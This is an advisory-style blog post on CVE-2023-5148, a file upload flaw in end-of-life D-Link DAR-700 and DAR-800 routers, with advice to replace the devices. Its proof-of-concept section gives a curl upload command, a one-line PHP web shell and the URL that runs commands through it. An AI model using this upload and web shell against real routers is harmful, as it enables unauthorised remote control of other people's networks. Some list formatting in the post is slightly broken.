CVE-2023-5148 - Critical Unrestricted File Upload Vulnerability in D-Link DAR-700 and DAR-800 – What You Need to Know

CVE-2023-5148 is a newly documented critical vulnerability that impacts D-Link DAR-700 and DAR-800 routers, with firmware releases up to December 31st, 2015. It enables an attacker to gain full control over affected devices by uploading malicious files. This post will break down what the vulnerability is, how attackers can exploit it, and what users should do—especially since these products are unsupported and end-of-life.

> TL;DR: If you still use the affected routers, they are no longer safe and should be replaced immediately.

What Is CVE-2023-5148?

CVE-2023-5148 is a file upload vulnerability found in the /Tool/uploadfile.php script of D-Link’s DAR-700 and DAR-800 routers. The core of the issue is that the input argument file_upload does not properly check or restrict what type of files a user can upload—making it possible for attackers to upload and run malicious code.

Key Details

- Vulnerable File: /Tool/uploadfile.php

Attack Vector: Remote, over the web interface

- CVE ID: CVE-2023-5148
- Reference: VDB-240244

How Does the Exploit Work?

The flaw is straightforward: the web interface responsible for uploading files does not limit the types or contents of files. This means that anyone with access to the interface could, for example, upload a web shell or other malicious script disguised as an image or harmless file.

An attacker could then use that uploaded file to run system commands as the device's web server user—effectively gaining full remote control.

Example Exploit (Proof of Concept)

Here’s a simplified version of how an attacker might exploit this issue with curl (a popular command-line tool for sending HTTP requests):

curl -X POST http://<router_ip>/Tool/uploadfile.php \
  -F "file_upload=@cmd.php" \
  -F "submit=Upload"

Where cmd.php is a malicious PHP script, such as

<?php system($_GET['cmd']); ?>

After a successful upload, the attacker can visit

http://<router_ip>/Tool/uploads/cmd.php?cmd=ls

And execute arbitrary commands on the device—such as printing directory contents or altering system files.

> Important: The exact exploit path and script name could vary depending on device configuration.

Target Rich: Many outdated routers are still in use in homes and businesses.

- Network Exposure: Once compromised, attackers can snoop, modify, or redirect all network traffic.

Is There a Patch or Fix?

No. The vendor has confirmed that DAR-700 and DAR-800 are end-of-life products and will not be fixed.

Official vendor statement: “Product is end-of-life. It should be retired and replaced.”

See vendor response: D-Link DAR-700 / 800 End-of-Life

Update to a currently supported router model with an active security life cycle.

> Keep in mind: Even if you "disable" web management, other vulnerabilities may exist due to lack of security updates.

More Information & References

- National Vulnerability Database: CVE-2023-5148
- VulDB: VDB-240244
- Exploit Published on VulDB (requires login)
- D-Link End of Support Policy

Conclusion

CVE-2023-5148 poses a severe risk to anyone using vulnerable D-Link DAR-700 and DAR-800 routers. Because the product is out of support and will never receive a fix, the only responsible action is to replace the device. Given how easy this exploit can be weaponized, keep yourself and your network secure. Don’t wait—migrate to a modern router as soon as possible.

If you need help choosing a new, secure device, look for vendors that provide long-term support and regular security updates.

Timeline

Published on: 09/25/2023 01:15:19 UTC
Last modified on: 11/07/2023 04:23:31 UTC